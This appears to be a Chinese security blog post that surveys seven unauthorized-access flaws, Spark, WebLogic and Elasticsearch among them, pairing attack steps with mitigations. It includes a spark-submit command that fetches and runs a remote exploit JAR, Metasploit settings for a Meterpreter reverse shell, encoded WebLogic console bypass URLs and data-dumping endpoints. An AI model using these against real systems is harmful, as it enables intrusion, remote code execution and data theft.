浅谈常见未授权访问漏洞系列(一)
2023-1-8 23:8:6 Author: 渗透安全团队(查看原文) 阅读量:19 收藏

一、技术背景

    未授权访问通俗点就是不需要经过网站的同意即可利用你的网站获取一些重要敏感信息(包括不仅限于本身系统配置信息/数据库账号/管理员账号)、系统权限或者直接进行敏感操作,而这些的起因大部分是由于开发人员对网站路径或API接口的安全配置以及权限认证做好严格把控导致的缺陷。

二、常见未授权访问漏洞系列(一)

1、SpringBoot Actuator 未授权访问

(1)攻

    一般在Actuator开启前提下,如果网站开发者在开发过程未对其路径做好相关的权限控制,可以通过这些路径获取到敏感信息,进而导致服务器被攻陷,例如:个人威胁最大的就是堆存储文件下载,下载之后可以发现很多账号和密钥信息(包括本身服务器信息、接口服务器信息、数据库连接信息等),进而拿下数据库权限/服务器权限。具体利用可参考往期文章:spring actuator未授权之heapdump分析及自动化利用.

(2)防

①对所有接口进行账号密码等权限控制。

②升级到最新的SpringBoot Actuator版本。

③做好安全策略,例如黑白名单访问控制。

2、Apache Spark未授权访问

(1)攻

    Apache Spark是可以支持用户对管理节点提交应用并且分发给集群进行执行的计算机系统。而存在未授权的点在我们攻击者可以直接在节点没有启动访问控制的时候对我们的集群发起恶意代码执行,导致服务器沦陷。

①利用StandaloneRestServer的API接口进行提交应用,然后通过其返回数据包中获取到submissionId,通过构造特定链接即可查看任务的运行情况。

rest服务端的默认端口号是6066http://123.123.123.123:6066/v1/submissions/createhttp://IP:8081/logPage/?driverId={submissionId}&logType=stdout

②可以利用 submissions 网关来进行提交应用,会使用到 Apache Spark 自带的bin/spark-submit脚本,利用方式如下:
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
③可利用MSF进行GetShell。
使用攻击模块:exploit/linux/http/spark_unauth_rce使用攻击payload为:java/meterpreter/reverse_tcp接下来就是配置好攻击的机器和端口即可exploit/run例如:set srvhost 192.168.2.8set srvport 8080set lhost 192.168.2.8set lport 4444set rhost 192.168.1.2set rport 6066漏洞环境配置完毕,输入run/exploit运行
(2)防

①对外关闭有危险的端口:6066、7077、8080、8081。

②开启用户名密码等权限验证。

③使用Spnego Authentication HTTP认证机制。

3、Solr 未授权访问

(1)攻

    我们都知道Solr是一个独立的企业级搜索应用服务器,它可以高效的管理我们的,里面包含Solr的常规配置信息、数据库的配置信息、各种敏感数据。攻击者可以利用该漏洞:

①获取数据库的配置信息拿下数据库权限。

②直接查询数据库数据信息。

③读取系统任意文件。

④拿下服务器webshell权限。

恶意链接:http://IP或域名/solr/adminhttps://IP或域名/solr/admin使用目录扫描可在字典中添加:/solr/admin
(2)防
①对/solr/admin进行账号密码等权限控制。
②开启黑白名单访问机制,不将solr放在公网上。
4、Weblogic 未授权访问
(1)攻
    Oracle WebLogic Server 管理控制台默认端口为7001,Weblogic 可通过多层URL编码绕过管理控制台权限验证机制获得Weblogic管理权限,可以接管后台所有操作以及获取各种信息数据。
恶意链接:http://IP:7001/console/css/%252e%252e%252fconsole.portalhttp://IP:7001//console/images/%252E%252E%252Fconsole.portalhttp://IP:7001//console/css/%25%32%65%25%32%65%25%32%66console.portal
    后续组合CVE-2020-14883利用,通过简单的GET请求以未授权的任意用户身份在我们的远程Weblogic服务器上执行命令,拿下该Oracle WebLogic Server服务器权限。
(2)防
①找到官网补丁或对其版本进行升级。
链接:https://www.oracle.com/security-alerts/cpuoct2020.html
②二次开发,对我们的后台文件重新命名。
③对我们的后台进行账号密码等权限控制。
5、Zabbix 未授权访问
(1)攻
    Zabbix是一款监控系统,具备网络监视功能,可以帮助用户更快更高效地管理网络,保证了服务器系统的安全运行。
    其zabbix.php页面未做严格的权限控制,我们可以直接访问该页面从而获得管理权限。
恶意链接:http://IP:3000/zabbix.php?action=dashboard.view&ddreset=1

(2)防
①对zabbix.php进行账号密码访问等权限控制。
②不要使用默认账户,将账户修改为强口令加密。
③zabbix其中的server与agent配置不能设置为root启动以及不可设置AllowRoot=1。
6、Kibana 未授权访问
(1)攻
    Kibana是与Elasticsearch一起配合使用的,默认开放端口为5601,我们可以通过Kibana直接管理查看Elasticsearch里面的所有数据信息,帮助攻击者进一步掌握该目标的信息。
恶意链接:http://IP:5601/app/kibana#/home?_g=()

(2)防
①配置网络安全策略,开启黑白名单访问控制。
②对Kibana设置本地监听并开启用户名密码验证机制。
7、Elasticsearch 未授权访问
(1)攻
    Elasticsearch 是一款企业级别的搜索服务软件,它可以用来进行日志分析,但是默认配置下Elasticsearch 也会开启9200以及9300端口,并且未对该端口进行权限限制,导致攻击者可以进行非法操作以及大量数据泄露。
恶意链接:直接访问9200、9300端口,出现"You Know, for Search"则有可能存在Elasticsearch 未授权访问。存在之后可以通过以下链接进行尝试攻击:#查看索引状态http://IP:9200/_cat/indiceshttp://IP:9300/_cat/indices#查看敏感信息http://IP:9200/_rvier/_searchhttp://IP:9300/_rvier/_search#管理界面http://IP:9200/_plugin/head/webhttp://IP:9300/_plugin/head/web#查看数据库敏感信息http://IP:9200/_river/_searchhttp://IP:9300/_river/_search#查看节点数据http://IP:9200/_nodeshttp://IP:9300/_nodes

(2)防
①配置网络安全策略,开启黑白名单访问控制。
②也可以在config/elasticsearch.yml配置文件中对9200和9300端口进行设置,开启账号密码等权限认证机制。

③不将该应用放置在公网上,避免遭到恶意攻击。
④开启web应用防火墙(WAF)。

三、总结
    未授权漏洞是最经常见到的一种漏洞,也是一种可以快速帮助我们拿到web管理权限的漏洞,通过该漏洞拿下服务器权限的比例大概占了3成左右,所以了解各大中间件以及系统软件产品的未授权访问漏洞是非常有必要的,本次讲了7种漏洞,感兴趣的兄弟姐妹可以自己搭建靶场进行试验,这样可以帮助我们快速熟悉每个漏洞的危害以及进一步利用


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495785&idx=2&sn=d24ada636bddcca93f08707a83ccb980&chksm=c1760dc6f60184d0186caa7f5139ea133df00a56114b3bdbdf80457bc339dbfb5f6690265dd3#rd
如有侵权请联系:admin#unsafe.sh